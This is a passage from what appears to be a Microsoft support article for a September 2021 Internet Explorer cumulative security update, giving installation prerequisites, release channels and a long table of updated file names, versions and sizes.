history](<https://support.microsoft.com/help/4009470>)\n\n**Important: **\n\n * As of February 11, 2020, Internet Explorer 10 is no longer in support. To get Internet Explorer 11 for Windows Server 2012 or Windows 8 Embedded Standard, see [KB4492872](<https://support.microsoft.com/help/4492872>). Install one of the following applicable updates to stay updated with the latest security fixes:\n * Cumulative Update for Internet Explorer 11 for Windows Server 2012.\n * Cumulative Update for Internet Explorer 11 for Windows 8 Embedded Standard.\n * The September 2021 Monthly Rollup.\n * Some customers using Windows Server 2008 R2 SP1 who activated their ESU multiple activation key (MAK) add-on before installing the January 14, 2020 updates might need to re-activate their key. Re-activation on affected devices should only be required once. For information on activation, see this [blog](<https://aka.ms/Windows7ESU>) post.\n * WSUS scan cab files will continue to be available for Windows 7 SP1 and Windows Server 2008 R2 SP1. If you have a subset of devices running these operating systems without ESU, they might show as non-compliant in your update management and compliance toolsets.\n\nThis article applies to the following: \n\n * Internet Explorer 11 on Windows Server 2012 R2\n * Internet Explorer 11 on Windows 8.1\n * Internet Explorer 11 on Windows Server 2012\n * Internet Explorer 11 on Windows Server 2008 R2 SP1\n * Internet Explorer 11 on Windows 7 SP1\n * Internet Explorer 9 on Windows Server 2008 SP2\n\n**Important: **\n\n * The fixes that are included in this update are also included in the September 2021 Security Monthly Quality Rollup. Installing either this update or the Security Monthly Quality Rollup installs the same fixes.\n * This update is not applicable for installation on a device on which the Security Monthly Quality Rollup from September 2021 (or a later month) is already installed. This is because that update contains all the same fixes that are included in this update.\n * If you use update management processes other than Windows Update and you automatically approve all security update classifications for deployment, this update, the September 2021 Security Only Quality Update, and the September 2021 Security Monthly Quality Rollup are deployed. We recommend that you review your update deployment rules to make sure that the desired updates are deployed.\n * If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see [Add language packs to Windows](<https://technet.microsoft.com/library/hh825699>).\n\n## **Known issues in this security update**\n\nWe are currently not aware of any issues in this update.\n\n## **How to get and install this update**\n\n**Before installing this update**To install Windows 7 SP1, Windows Server 2008 R2 SP1, or Windows Server 2008 SP2 updates released on or after July 2019, you must have the following required updates installed. If you use Windows Update, these required updates will be offered automatically as needed.\n\n * Install the SHA-2 code signing support updates: \n \nFor Windows 7 SP1, Windows Server 2008 R2, and Windows Server 2008 SP2, you must have the SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) that is dated September 23, 2019 or a later SHA-2 update installed and then restart your device before you apply this update. For more information about SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>). \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)) that is dated March 12, 2019. After update [KB4490628](<https://support.microsoft.com/help/4490628>) is installed, we recommend that you install the July 13, 2021 SSU ([KB5004378](<https://support.microsoft.com/help/5004378>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>). \n \nFor Windows Server 2008 SP2, you must have installed the servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)) that is dated April 9, 2019. After update [KB4493730](<https://support.microsoft.com/help/4493730>) is installed, we recommend that you install the October 13, 2020 SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)) or a later SSU update. For more information about the latest SSU updates, see [ADV990001 | Latest Servicing Stack Updates](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV990001>).\n * Install the Extended Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. \n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.**Important **You must restart your device after you install these required updates.**Install this update**To install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other following options. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005563>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Updates \n \n## **File information**\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### **Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 230,912 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:46| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 20:55| 489,472 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:36| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.18939| 10-Feb-2018| 9:17| 10,948,096 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:40| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nieetwcollector.exe| 11.0.9600.18666| 16-Apr-2017| 0:47| 104,960 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 2:19| 4,096 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 19:58| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 19:58| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 19:58| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 19:58| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:36| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 